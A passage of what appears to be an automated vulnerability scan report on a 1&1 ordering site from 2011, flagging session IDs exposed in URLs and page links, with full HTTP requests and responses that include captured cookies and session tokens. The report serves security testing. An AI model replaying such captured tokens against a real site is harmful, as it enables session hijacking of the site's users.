Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingAsp?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureSite-buildingBlog&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureSite-buildingBlog&amp;page=switch&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureSite-buildingBlog&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingCgi;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCgi?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureSite-buildingCnba&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureSite-buildingCnba&amp;page=switch&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
</div><a rel="blank" class="target" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">To 1&amp;1 Linux Web Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureSite-buildingCnba&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
